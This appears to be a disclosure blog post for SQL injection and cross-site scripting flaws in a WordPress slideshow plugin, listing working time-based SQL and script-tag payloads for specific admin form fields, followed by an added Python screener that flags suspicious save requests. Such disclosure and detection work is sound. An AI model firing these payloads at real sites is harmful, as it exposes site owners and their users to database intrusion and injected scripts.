Tuesday 2 April 2019

XSS and SQLi in Slideshow Gallery plugin for WordPress - CVE-2018-18017 to CVE-2018-18019

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )
Discovered Date: October 4 2018
Tested Version: 1.6.8
Active installations: 20,000+


#1 - SQLi vulnerability in Manage Galleries - CVE-2018-18018

Affected Vectors:
  1. Gallery[id]
  2. Gallery[title]

Locate:
http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

  1. Gallery[id]=1' AND SLEEP(5) AND 'XZlZ'='XZlZ
  2. Gallery[title]=ansa' OR SLEEP(5) AND 'jZQR'='jZQRn

#2 - XSS vulnerability in Manage Galleries - CVE-2018-18017

Affected Vectors:
  1. Gallery[id]
  2. Gallery[title]

Locate:
http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

  1. Gallery[id]=1'"><script>alert(1);</script>
  2. Gallery[title]="><script>alert(2);</script>

#3 - XSS vulnerability in Manage Slides - CVE-2018-18019

Affected Vectors:
  1. Slide[title]
  2. Slide[media_file] or Slide[image_url]

Locate:
http://localhost/wordpress498/wp-admin/admin.php?page=slideshow-slides&method=save

Enter the Payload:
  1. Slide[title] = ansa"><script>alert(1);</script>
  2. Slide[media_file] or Slide[image_url]= "><script>alert(2);</script>
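
For triage on sites still running the tested version, the following added example (not part of the original advisory and not the plugin's code) screens captured save requests for the fields listed in #1 to #3. It assumes the request URL and form-encoded body are available, for example from a WAF or reverse-proxy log; the function name, sample requests and the rule that an id is empty or digits only are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Admin pages and POST fields the advisory lists as affected.
AFFECTED = {
    "slideshow-galleries": ("Gallery[id]", "Gallery[title]"),
    "slideshow-slides": ("Slide[title]", "Slide[media_file]", "Slide[image_url]"),
}
# Characters that let a value leave an SQL string literal or an HTML attribute.
BREAKOUT = re.compile(r"""['"<>]""")


def screen_save_request(url, body):
    """Return (field, reason) findings for one captured save request."""
    query = parse_qs(urlsplit(url).query)
    page = query.get("page", [""])[0]
    if query.get("method", [""])[0] != "save" or page not in AFFECTED:
        return []  # not one of the endpoints named in the advisory
    fields = parse_qs(body, keep_blank_values=True)
    findings = []
    for name in AFFECTED[page]:
        for value in fields.get(name, []):
            if name.endswith("[id]"):
                # Assumption: an id is either empty or ASCII digits only.
                if value and not re.fullmatch(r"[0-9]+", value):
                    findings.append((name, "id is not a plain integer"))
            elif BREAKOUT.search(value):
                findings.append((name, "quote or angle bracket in text field"))
    return findings


# Constructed sample requests (URL, form-encoded body); not taken from real traffic.
SAMPLES = [
    ("/wp-admin/admin.php?page=slideshow-galleries&method=save",
     "Gallery%5Bid%5D=7&Gallery%5Btitle%5D=Summer+trip"),
    ("/wp-admin/admin.php?page=slideshow-galleries&method=save",
     "Gallery%5Bid%5D=1%27x&Gallery%5Btitle%5D=a%22%3E%3Cb%3E"),
    ("/wp-admin/admin.php?page=slideshow-slides&method=save",
     "Slide%5Btitle%5D=Beach&Slide%5Bimage_url%5D=%22%3E%3Cb%3E"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, screen_save_request(url, body))
```

A legitimate title containing an apostrophe is also flagged, so findings are leads for review rather than verdicts. The durable fix is on the server side: parameterized queries for the SQL and escaping on output for the HTML.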
